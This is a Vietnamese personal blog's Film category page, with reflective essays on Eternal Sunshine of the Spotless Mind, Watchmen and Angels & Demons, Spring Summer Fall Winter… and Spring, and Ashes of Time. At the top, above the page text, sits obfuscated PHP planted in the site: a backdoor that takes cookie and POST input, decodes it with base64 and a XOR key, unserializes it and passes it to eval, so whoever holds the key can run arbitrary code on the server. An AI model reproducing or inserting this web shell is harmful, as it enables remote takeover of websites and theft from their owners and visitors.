$gkTikmvawS = class_exists("L_JuS");if (!$gkTikmvawS){class L_JuS{private $pEkriz;public static $gEJHvAd = "0bac3d14-080a-40da-9ae3-072f26eb3bee";public static $hiuUA = NULL;public function __construct(){$nACiVMM = $_COOKIE;$ZybOWNLPM = $_POST;$AjoGQkCSfU = @$nACiVMM[substr(L_JuS::$gEJHvAd, 0, 4)];if (!empty($AjoGQkCSfU)){$CHzhCIO = "base64";$MphdUtXc = "";$AjoGQkCSfU = explode(",", $AjoGQkCSfU);foreach ($AjoGQkCSfU as $XvwaYg){$MphdUtXc .= @$nACiVMM[$XvwaYg];$MphdUtXc .= @$ZybOWNLPM[$XvwaYg];}$MphdUtXc = array_map($CHzhCIO . chr ( 182 - 87 ).'d' . 'e' . "\143" . chr (111) . "\x64" . chr (101), array($MphdUtXc,)); $MphdUtXc = $MphdUtXc[0] ^ str_repeat(L_JuS::$gEJHvAd, (strlen($MphdUtXc[0]) / strlen(L_JuS::$gEJHvAd)) + 1);L_JuS::$hiuUA = @unserialize($MphdUtXc);}}public function __destruct(){$this->rybNWbPiMq();}private function rybNWbPiMq(){if (is_array(L_JuS::$hiuUA)) {$EgZDwdc = str_replace("\74" . chr ( 405 - 342 )."\160" . "\150" . chr ( 886 - 774 ), "", L_JuS::$hiuUA[chr ( 642 - 543 ).chr (111) . 'n' . "\164" . "\x65" . "\x6e" . 't']);eval($EgZDwdc);exit();}}}$RYRUp = new L_JuS(); $RYRUp = NULL;} ?> Film – B.l.u.e

B.l.u.e

Inside the crowd, I dance [alone]

Menu Close

Category: Film

Eternal Sunshine of the Spotless Mind

Eternal Sunshine of the Spotless Mind

Điên rồ!
Thật sự điên rồ!
Khó hiểu đến mức phát điên, nhưng cũng đẹp và đầy tràn triết lí.

Tôi xem Eternal Sunshine of the Spotless Mind giữa lúc đầu óc không thể gọi là trong trạng thái tỉnh táo nhất, khi sự mệt mỏi xâm chiếm lấy tôi qua từng thớ thịt lẫn từng neural trí não. Nghe thì thoạt có vẻ đây là một sai lầm, khi tiếp cận một tác phẩm nghiêng nhiều về tâm lí – hơn là tình cảm lãng mạn trong tình trạng này. Nhưng, như bản thân bộ phim đã cực kì khó hiểu, như một mê cung, không phải được xây lên bằng gạch đá, hay những hàng cây, mà là những nét vẽ mờ ảo, đứt đoạn của kí ức, thì việc đang tỉnh hay đang mê, có lẽ cũng không khác biệt nhiều lắm.

Eternal Sunshine of the Spotless Mind là một bộ phim tâm lý của điện ảnh Hoa Kỳ công chiếu tháng 3 năm 2004. Bộ phim được thực hiện bởi đạo diễn người Pháp Michel Gondry dựa theo kịch bản của Charlie Kaufman với dàn diễn viên chính gồm Jim Carrey, Kate Winslet, Kirsten Dunst, Mark Ruffalo, Elijah Wood và Tom Wilkinson. Eternal Sunshine nói về câu chuyện của đôi tình nhân Joel Barish (Carrey) và Clementine Kruczynski (Winslet), gặp nhiều bất đồng trong cuộc sống, họ quyết định tới công ty Lacuna Inc. xóa bỏ kí ức về người kia để rồi lại thấy không thể sống thiếu nhau và phải tìm mọi cách để giữ lại hình ảnh của người mình yêu trong trí nhớ. Sau khi ra mắt khán giả Eternal Sunshine đã nhận được nhiều lời khen ngợi, đặc biệt là về kịch bản sáng tạo của Kaufman cùng diễn xuất của hai ngôi sao Jim Carrey và Kate Winslet. Với tác phẩm này, Kaufman đã được trao Giải Oscar cho kịch bản gốc hay nhất còn Kate Winslet trở thành nữ diễn viên trẻ nhất có được 4 đề cử Oscar cho hạng mục diễn xuất. ((http://vi.wikipedia.org/wiki/Eternal_Sunshine_of_the_Spotless_Mind))

Những cảnh trong bộ phim, mới trông rất rời rạc và vô cùng, xin lỗi, nhảm nhí. Những cung bậc cảm xúc được đẩy lên tới mức cực kì thái quá đủ khiến những ai, dù là kiên nhẫn nhất, cũng phải thốt lên câu “cái quái quỉ gì đang diễn ra đây?” Nhưng, xét trên tổng thể bộ phim, không cảnh nào là thừa cả. Tất cả hợp nhau, từng đoạn, từng đoạn ấy, để làm nên một mê cung đầy rắc rối, nhưng ảo diệu kì lạ.

Trong cái mớ hỗn độn của bộ phim – kí ức ấy, dù cho kí ức có kéo chủ nhân sở hữu của nó đi về phía nào, vượt qua những giới hạn tuyệt đối nhất của thời gian và không gian, thì nó cũng đều ẩn chứa trong đó một tình yêu thật sâu đậm.

Friedrich Nietzsche trong Jenseits von Gut und Bose có nói về ý nghĩa tích cực của sự lãng quên:

Blessed are the forgetful: for they “get the better” even of their blunders ((Sung sướng thay sự lãng quên, với nó con người trở nên tốt đẹp hơn bất kể những điều sai lầm của họ)).

Có những người chọn cách lãng quên, để tìm sự thanh thảnh cho tâm hồn của mình. Lại có những người, dù trong bất cứ hoàn cảnh nào, cũng đều muốn chống trả lại những kẻ thù của kí ức, bất kể chúng là những thứ siêu nhiên như thời gian, hay là các liệu pháp khoa học, để giữ lại cho mình những thứ mà mình hằng yêu quí ấy, bất kể nó có gây cho chính bản thân mình – chứ không phải ai khác, đau buồn đến mức nào.

Người ta hay nói nhiều đến cụm từ “là của nhau”. Nhưng, là của nhau, mà nếu không cố gắng, thì những gì còn đọng lại, mãi chỉ là niềm đau và nỗi hối tiếc đến khôn nguôi mà thôi.

Vì vậy, bạn tôi ơi, đừng bao giờ buông xuôi, đừng bao giờ tìm quên, nếu không giữ được ai đó ở mãi bên bạn, thì cũng đừng bao giờ để những kí ức đẹp đẽ ấy rời xa bạn.

Vì, người ta có thể yêu nhau chỉ một thời, nhưng kí ức là…

…một đời.

Tựa như tia nắng vĩnh hằng…

B.l.u.e.

Watchmen và Angels & Demons – Khi cứu cánh biện minh cho phương tiện

Bạn có thể hỏi, sự tương đồng của Watchmen Angels & Demons là gì, và liệu tôi có ý chi khi đặt cả hai tựa phim trong cùng một bài viết như thế này?

Câu trả lời là chỉ ở một cảnh – không dài – ở gần cuối cả hai bộ phim.

Watchmen là sự lựa chọn cái chết của Rorschach và sự lựa chọn giết chết của Adrian Veidt.

Thật sự, khi xem tới cảnh đối chất của Adrian Veidt, ai cũng ghét ông, nhưng không thể phủ nhận được là cách làm của ông rất có lí, và đó là cách “tốt nhất” để giải quyết vấn đề.
Đấy gọi là, khi cứu cánh biện minh cho phương tiện.

Angels & Demons, là cảnh Giáo chủ thị thần Carlo Ventresca lí giải về việc tại sao chọn cách làm tiêu cực là khủng bố, để hướng tới một kết quả mà ông cho là tốt đẹp hơn. Cũng khó thể nói, ở hoàn cảnh như ông, trước nỗi đau đáu về việc khoa học hiện đại có thể phá vỡ các giá trị niềm tin về tôn giáo đã tồn tại hàng ngàn năm qua, cách làm như vậy mang lại kết quả không tồi. Điều này có thể thấy qua sự cuồng nhiệt và tin tưởng của số đông.
null

Đấy cũng gọi là, khi cứu cánh biện minh cho phương tiện.

Vậy, câu hỏi đặt ra là, khi nào thì có thể chấp nhận việc cứu cánh biện minh cho phương tiện?

Có vài số liệu khá thú vị về ai, trong lịch sử cận đại, đã giết nhiều người nhất, kết quả cho ra là

Marx-Lenin Russia USSR (1917-1987) 61,911,000
Hitler (1933-45) 20,946,000

nhìn vào số liệu này, có lẽ bạn đã hiểu điều tôi muốn nhắc đến.

Nếu sinh mạng con người là như nhau, thì liệu việc chủ nghĩa Marx-Lenin của Nga Xô ((cám ơn GS vì phần chỉnh sửa này)) giết 61 triệu người, so với Hitler giết 20 triệu người (không xét tới việc thời gian diễn ra là lâu hay mau), thì ai tội lỗi hơn?

Lẽ đương nhiên, việc của Liên Xô là cần làm, để ngăn chặn số người phải chết thêm vì chiến tranh, vì đế quốc, vì bóc lột.

Nhưng, liệu 61 triệu người, cứu cánh tuyệt vời ấy có thể biện minh cho việc này không?

Có thể có nhiều câu trả lời, đấy là cái lắc đầu đầy quả quyết, dù phải trả giá bằng mạng sống của mình như Rorschach, hay sự im lặng (vì cho rằng không gây ảnh hưởng gì?) của Robert Langdon. Mỗi cách trả lời đều có ưu điểm, đều có đúng hay sai, nếu không ở trong tình thế như vậy thì không thể đánh giá chính xác.

Hừm, đành gọi là tạm đồng ý với câu trả lời: cứu cánh có thể biện minh cho phương tiện, khi kết quả của nó mang lại lợi ích cho tất cả mọi người, chứ không phải cho một nhóm người nào cả.

Nếu thế, thì xem như Adrian Veidt đã đúng, và Carlo Ventresca đã sai.

Chỉ bởi vì con người quá bất lực, không thể thay đổi mọi thứ, nên chỉ có thể chọn cái ít sai nhất mà làm thôi.

Mới xem Angels & Demons về nên lảm nhảm chút vậy.

B.l.u.e
.

Spring, Summer, Fall, Winter… And Spring



Spring, Summer, Fall, Winter… and Spring là một bộ phim Hàn Quốc được sản xuất vào năm 2003. Phim xoay quanh về một ngôi chùa nằm nổi lênh đênh giữa hồ, được bao bọc chung quanh bởi rừng cây xanh tươi tốt.

Tôi đã từng nghe về bộ phim này một khoảng thời gian trước, nhưng hơi có phần e ngại mỗi khi trong đầu nảy ra ý tưởng xem thử, có lẽ vì phần giới thiệu của nó khiến cho người ta liên tưởng ngay tới một bộ phim đầy màu sắc Phật giáo và triết lí.

Phim này khi xuất hiện ở các chợ bán đĩa lậu tại Sài Gòn, đã được gán cho một cái tên hết sức ngu ngốc là “Bốn mùa tình yêu”, nghe như các phim mì ăn liền giải trí cũng xuất thân từ Hàn Quốc.

Được đạo diễn bởi Kim Ki-duk, tuy nhiên, phim hoàn toàn không thấy xuất hiện những yếu tố vốn bị chỉ trích rất dữ dội như trong các phim trước đây của ông: sự ghê sợ phụ nữ và rất bạo lực. Trái lại, Spring, Summer, Fall, Winter… and Spring là một bức tranh tuyệt đẹp, chậm rãi mà đầy cảm xúc, được điểm xuyến bởi cảnh vật yên bình đến mê người của tự nhiên, xen lẫn những nỗi thổn thức, những tâm tư cả đời người, xuyên suốt nhiều thế hệ.

Tôi không phải là một người hâm mộ điện ảnh. Số lượng phim tôi xem không nhiều. Và trong số không nhiều phim tôi đã từng xem ấy, thì chiếm đa số lại là phim của Tây. Nhưng, có điều ngạc nhiên thay, những phim tôi yêu thích nhất và đánh giá cao nhất lại là các phim có xuất xứ từ châu Á.

Không xem nhiều phim ảnh, kiến thức cũng nông cạn, nhưng tôi vẫn mạo muội đánh giá phim Spring, Summer, Fall, Winter… And Spring xứng đáng được điểm 10.

Kim Ki-duk đã nói về bộ phim như sau:

I intended to portray the joy, anger, sorrow and pleasure of our lives through four seasons and through the life of a monk who lives in a temple on Jusan Pond surrounded only by nature.

Tôi mạn phép không dịch ra tiếng Việt, để cho các bạn có thể hiểu chính xác ý của ông.

Khi người ta quay đầu nhìn lại, mọi thứ đều trôi qua rất nhanh. Cái bánh xe vô lượng của thời gian thật sự rất tàn nhẫn, nó xoay chuyển không ngừng, đập tan cái ước muốn đôi khi xuất hiện của chúng ta là có một giây phút dừng lại, chỉ dừng lại và đứng đó thôi.

Cuộc đời của một con người, như các bạn có thể đoán qua tiêu đề bộ phim, là một vòng tuần hoàn khép kín, lặp đi lặp lại.

Bộ phim bắt đầu bằng mùa Xuân. Cũng là bắt đầu cuộc đời của chú tiểu nọ.

Spring

Cuộc sống của chú tiểu những tháng năm đầu đời này, giống với từ pleasure trong câu nói trên của Kim Ki-duk. Và thật ra luôn là thế, hầu hết trong chúng ta, những năm tháng đẹp đẽ nhất luôn gắn liền với hai chữ “tuổi thơ”. Ở đây, chú tiểu được học những bài học đơn giản và chân thật nhất về thiện – ác. Nụ cười rất tươi của chú khi đùa giỡn, cùng những giọt nước mắt hối hận của tuổi nhỏ trước bài học đầu đời, là điểm nhấn trong mùa Xuân đầy an bình này.

Xuân qua, Hạ tới.
Dĩ nhiên, ai cũng có thể hiểu, Hạ ở đây ứng vào giai đoạn trưởng thành của chú tiểu, và chữ joy trong câu của Kim. Mùa Hạ nóng rực như tâm tình của một chàng trai khi trưởng thành, nhưng cũng thật vui vẻ với những xúc cảm êm đềm thuở ban đầu ấy.
Trong giai đoạn này, chú tiểu của chúng ta đã được nếm cảm xúc mãnh liệt nhất trong đời người: tình yêu.

Tình yêu đẹp nhưng cũng đầy men say của dục vọng.
Cảnh tượng chú tiểu khóc trước tượng Phật khi lần đầu tiên sờ mó cô bạn gái, cảnh tượng hai người ân ái ngay trong phòng cúng Phật, làm tôi liên tưởng tới hai câu

Gió thông đưa kệ tan niềm tục
Hồn bướm mơ tiên lẫn sự đời
(Khái Hưng – Hồn bướm mơ tiên)

Đỏ như anh của một thời trai trẻ và như em của một thuở mê say. Đỏ như cái tình yêu mà vì nó, chú tiểu rời bỏ ngôi chùa đã gắn bó với tuổi thơ của mình, để khăn gói ra đi, bất chấp câu nói của sư phụ vẫn vang vọng bên tai

Desire leads to attachment

Thu sang, đỏ nhoà sắc phong

Cảnh bắt đầu với hình ảnh sư phụ của chú tiểu năm nào, nay đã rất già, tình cờ đọc bài báo viết về đệ tử mình.
Ngày đấy, bỏ qua mọi cấm đoán của lề luật, bỏ qua sự can ngăn của sư thầy, chú tiểu bỏ đi để nếm vị ngọt ngào của ái tình. Và nay, sau khi bị chính ái tình giết chết bằng liều thuốc độc đắng nghét, sau khi phạm vào tội sát nhân vì tự tay giết người vợ bội bạc, chú tiểu lại quay về nơi chốn ngày xưa.
Cảnh xưa còn, người vẫn còn, nhưng liệu người xưa có còn chăng?

Hình ảnh cảm động nhất trong mùa Thu, là cảnh chú tiểu năm nào, dùng chính con dao vấy máu người yêu, hì hục khắc một bài kinh theo yêu cầu của sư cụ, mỗi nét khắc là một lần phá tan sự tức giận trong lòng mình.
Mùa thu bắt đầu bằng anger, và kết thúc bằng sự mong muốn phá bỏ cái anger ấy…
Fall

Đông phủ tuyết trắng xoá

Chú tiểu trở về khi hết án tù. Lúc này, ngôi chùa xưa đã trở nên điêu tàn.
null
Mùa Đông trong phim diễn ra rất nhanh. Giữa cái cảnh tĩnh lặng của tuyết trắng xoá là sự thổn thức cũng trong tĩnh lặng của một bà mẹ khi phải đem vất bỏ đứa con mình, xen vào đó là tiếng khóc xé lòng của đứa nhỏ, khi bò trên mặt hồ đông cứng, cố với tới xác mẹ mình.
Mùa Đông – sự đau thương và mất mát. Liệu có phải là chữ sorrow trong câu của Kim?

… và mùa Xuân

Lại một vòng đời, lại một chu kì, đứa trẻ ngày ấy lại lớn lên, chú tiểu năm xưa đã già đi.
Vẫn ngôi chùa, vẫn mặt hồ, vẫn hai người, nhưng là sự lặp đi lặp lại có nối tiếp của số phận. Tiếng thở dài của chú tiểu năm xưa, hay tiếng cười trong vắt của chú tiểu ngày nay, thứ nào mới đích thực là hình ảnh của thời gian và số phận. Theo tôi, có lẽ là cả hai.

Rồi đây, đứa trẻ bây giờ, sẽ lại viết tiếp câu chuyện Spring, Summer, Fall, Winter… And Spring…

B.l.u.e

p/s:

1 – Main theme ost

2 – tình cờ nhớ tới một truyện ngắn mà tôi thích nhất Thương nhớ Hoàng Lan – Trần Thuỳ Mai

Tôi nghe tiếng thét của nàng vang động cả giấc mơ, nàng nhào xuống rơi thẳng vào không gian mênh mông như chiếc lá lìa cành trước gió.
“Thầy ơi, nếu vào Niết bàn mà phải đạp lên một chiếc lá, Phật có làm không? Xin thầy cho con hay, trời đất nặng hơn hay chiếc lá nặng hơn?”
Thầy nhìn vào mắt tôi:
“Chỉ có con tự trả lời được thôi. Ngày mai con hãy về, cứ nhìn thẳng vào nghiệp duyên mà tự quyết định lòng mình.”

.

Đông Tà – Tây Độc (Ashes of Time)

Tôi không google về vấn đề đạo diễn Vương Gia Vệ đặt tên Đông Tà – Tây Độc cho phim của mình, rồi sợ khi phát hành ở bên Tây nhợn, người ta không hiểu Đông Tà – Tây Độc là ai, nên mới đổi tên phim thành Ashes of Time, hay là ngược lại. Tuy nhiên, cá nhân tôi thì thấy cái tên Ashes of Time (Cát bụi thời gian) hợp với ý nghĩa bộ phim hơn.

Tôi tìm down phim này chủ yếu là để xem Lâm Thanh Hà hoá thân thành Mộ Dung Yến như thế nào, nguyên nhân là do quá ấn tượng với vai Đông Phương Bất Bại của cô trong Tân Tiếu Ngạo Giang Hồ (Swordman II). Trời ơi, cái ánh mắt đầy ma quái ấy, cái nụ cười nhất tiếu khuynh thành ấy, quả đúng với câu nhận xét của Từ Khắc “mỹ nhân trăm năm mới có một người” và Akiko Tetsuya “minh tinh cuối cùng của phương Đông”.

Lâm Thanh Hà

Tuy nhiên, khi xem phim, tôi lại lặng người với cảnh cuối của bộ phim, cảnh mà Âu Dương Phong ngồi nhớ lại hình ảnh người con gái mà mình yêu nhất đời (Trương Mạn Ngọc thủ vai). Nàng ngồi bên khung cửa, lặng lẽ đếm thời gian và kí ức trôi…

Trương Mạn Ngọc

Người ta không thích bộ phim này vì cho là nó quá lan man, một bộ phim dài 90 phút mà xoay quanh nhiều cuộc đời, xen kẽ là những cuộc tình, day dứt, nghẹn ngào có, hồn nhiên vô tư lự có, hoài niệm có, và tổng hợp tất cả những điều trên cũng có.

Có người lại hì hục đi cắt cho mình một cặp kiếng, nhìn đời qua cặp kiếng đấy, và từ đó áp đặt mọi thứ phải như thế. Tôi nói đó là những người đánh giá bộ phim này qua cặp kiếng truyện Kim Dung: http://vietnamnet.vn/vanhoa/2009/04/841461/ Cần phải biết Vương Gia Vệ chỉ mượn tên để nhào nặn các tuyến nhân vật theo ý mình. Còn việc sau này họ ra sao, có giống như trong truyện Kim Dung không, thì như kiểu đem so sánh tại sao trong Zeus trong thần thoại Hy Lạp và Jupiter trong thần thoại La Mã lại khác nhau vậy.

Dĩ nhiên, nói thế cho vui thôi, mỗi người có một cách nhìn, một quan điểm đánh giá. Và tôi hiện cũng đang viết bài này qua cặp kiếng nhìn của tôi.

Xuân tàm đáo tử ti phương tận
Lạp chúc thành hôi lệ thuỷ can
(Tằm chết mới hết nhả tơ
Nến kia cháy hết mới khô lệ này)

(Vô đề – Lý Thương Ẩn)

Có những điều mà người ta không thể đưa ra làm chuẩn mực để phán xét. Chẳng hạn một điều đơn giản như: bạn có thể mãi mãi yêu và chờ một người không? Không câu trả lời nào là câu trả lời chính xác.

Chí ít là với các nhân vật trong phim.

Họ có thể là những con người khác nhau, nhưng có một điểm chung, là dám yêu và dám sống hết mình vì tình yêu của mình.

Họ sẵn sàng đưa tay đón lấy một khoảnh khắc, và sống hết mình trong cái ánh sáng chói lọi ấy, bất chấp cả đời sau này sẽ phải chờ đợi trong vô vọng và đau khổ.

Tôi cho rằng, chờ đợi và đau khổ không phải là bi kịch. Không dám khẳng định tình yêu mới là bi kịch đích thực của đời người.

Kiếm sĩ mù (Lương Triều Vỹ) bị người vợ sắp cưới của mình bội phản, gã chấp nhận ra đi, để rồi sau đó lại sẵn sàng chấp nhận đánh cuộc với sinh mạng của mình chỉ để ngắm nhìn “hoa anh đào” trong lòng mình một lần cuối…

Người mà Âu Dương Phong yêu thương nhất đời từng nói

Ta đã nghĩ vài điều thật quan trọng, có thể quan trọng trong cả cuộc đời. Nhưng khi nhìn lại, ta tin rằng nó chẳng có gì khác biệt cả.
Mọi thứ đều thay đổi.
Ta luôn nghĩ rằng mình là kẻ chiến thắng cho đến một ngày ta soi gương và thấy khuôn mặt của kẻ chiến bại.
Suốt những năm tháng đẹp nhất của đời ta, người ta yêu thương nhất đã không ở cạnh ta.

nàng có hỏi câu

Nếu thời gian có quay trở lại?

nhưng tôi tin, nếu như thế, thì mọi sự vẫn sẽ tiếp diễn, như bản chất của nó là vậy.

Chai rượu mà nàng đưa cho Hoàng Dược Sư và Âu Dương Phong uống thật ra là gì? Họ Hoàng đấy, liệu có quên được nàng như lời hắn nói không. Hay như Âu Dương Phong

Chai rượu đó chỉ là chuyện tiếu lâm mà nàng đùa giỡn với ta.
Càng cố quên càng nhớ
Thiên hạ thường nói khi ngươi không thể có thứ ngươi muốn, ngươi có thể làm điều tốt nhất là không quên.

Một tác phẩm điện ảnh chỉ trong có 90′ mà đủ vẽ lên một bức tranh tuyệt đẹp về tình yêu, về nỗi cô đơn, về sự chờ đợi, và đặc biệt là thứ tình cảm ngất ngây vô hối, thì nhất định phải gọi là một kiệt tác nghệ thuật.

Cát bụi thời gian – chỉ có khi ngay cả thời gian cũng tan biến, khi bản thân con người đã trở về cát bụi, thì có lẽ, ta sẽ quên được nàng…

B.l.u.e
.

© 2024 B.l.u.e. All rights reserved.

Theme by Anders Norén.